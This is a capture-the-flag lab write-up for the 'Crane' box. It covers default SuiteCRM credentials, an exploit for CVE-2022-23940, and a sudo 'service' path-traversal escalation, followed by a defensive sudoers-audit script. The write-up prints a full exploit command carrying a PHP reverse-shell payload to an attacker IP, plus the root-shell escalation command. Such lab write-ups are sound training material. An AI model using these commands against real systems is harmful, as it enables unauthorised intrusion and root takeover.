Crane

Source: Proving Grounds
OS: Linux
Community Rating: Easy

Enumeration & Reconnaissance

  • I started with autorecon as usual, which exposed the following ports:

    • SSH (22)

    • HTTP (80)

    • 3306

    • 33060

Service Analysis

  • I began with HTTP (80), which hosted a SuiteCRM site. I tried the default credentials (admin:admin) and, as easy as that, I was in! I browsed around for a bit and then checked for a CVE. I found CVE-2022-23940, which provides RCE. I downloaded the PoC, which required valid credentials, and we already had them.

[Screenshot: SuiteCRM]

Gaining Initial Access

  • I started a listener and ran the PoC with the following command (the inner double quotes and the $ must be backslash-escaped so the shell passes the PHP one-liner through intact): python exploit.py -h http://192.168.197.146 -u admin -p admin --payload "php -r '\$sock=fsockopen(\"192.168.45.201\", 4444); exec(\"/bin/sh -i <&3 >&3 2>&3\");'"

  • This delivered a reverse shell.

[Screenshot: reverse shell]

Privilege Escalation

  • I then uploaded linpeas, which exposed that I could run /usr/sbin/service as root without a password. Checking gtfobins for a suitable command, I ran: sudo service ../../bin/sh and got a root shell.

[Screenshot: sudo -l]
[Screenshot: root access]
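As an added illustration (not part of the original writeup), the following Python audits sudoers rules for the exact pattern abused here and shows why service ../../bin/sh lands in /bin/sh. It assumes the Debian service wrapper resolves its first argument under /etc/init.d and uses a constructed sudoers sample, not the box's real file.

```python
import posixpath
import re

INIT_DIR = "/etc/init.d"
SERVICE_BINS = {"/usr/sbin/service", "/usr/bin/service"}

# Constructed sample sudoers content; not taken from the box.
SAMPLE_SUDOERS = """\
Defaults env_reset
root     ALL=(ALL:ALL) ALL
www-data ALL=(ALL) NOPASSWD: /usr/sbin/service
deploy   ALL=(root) NOPASSWD: /usr/sbin/service apache2 restart
"""

RULE_RE = re.compile(r"^(\S+)\s+\S+\s*=\s*\(([^)]*)\)\s*((?:NOPASSWD|PASSWD):\s*)?(.+)$")


def service_target(service_arg, init_dir=INIT_DIR):
    """Path that `service <arg>` ends up executing: /etc/init.d joined with
    the argument and normalised, so '../../bin/sh' collapses to '/bin/sh'."""
    return posixpath.normpath(posixpath.join(init_dir, service_arg))


def escapes_init_dir(service_arg, init_dir=INIT_DIR):
    """True when the argument resolves outside /etc/init.d (path traversal)."""
    return not service_target(service_arg, init_dir).startswith(init_dir + "/")


def audit_sudoers(text):
    """Return (user, command, nopasswd) for rules that let a user run the bare
    `service` binary as root with any argument: the misconfiguration used here.
    A rule that pins the arguments (e.g. 'service apache2 restart') is not flagged."""
    findings = []
    for line in text.splitlines():
        m = RULE_RE.match(line.split("#", 1)[0].strip())
        if not m:
            continue
        user, runas, nopasswd, cmds = m.groups()
        if runas.split(":")[0].strip() not in ("ALL", "root"):
            continue  # this rule cannot become root
        for cmd in (c.strip() for c in cmds.split(",")):
            parts = cmd.split()
            if parts and parts[0] in SERVICE_BINS and len(parts) == 1:
                findings.append((user, cmd, bool(nopasswd)))
    return findings


if __name__ == "__main__":
    for user, cmd, nopw in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{user}: '{cmd}' as root, NOPASSWD={nopw}")
    print(service_target("../../bin/sh"))  # /bin/sh
```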

Lessons Learned

  • Default credentials can provide immediate access.

  • Simple misconfigurations, such as a service executable running as root without a password, offer a straightforward path to privilege escalation.
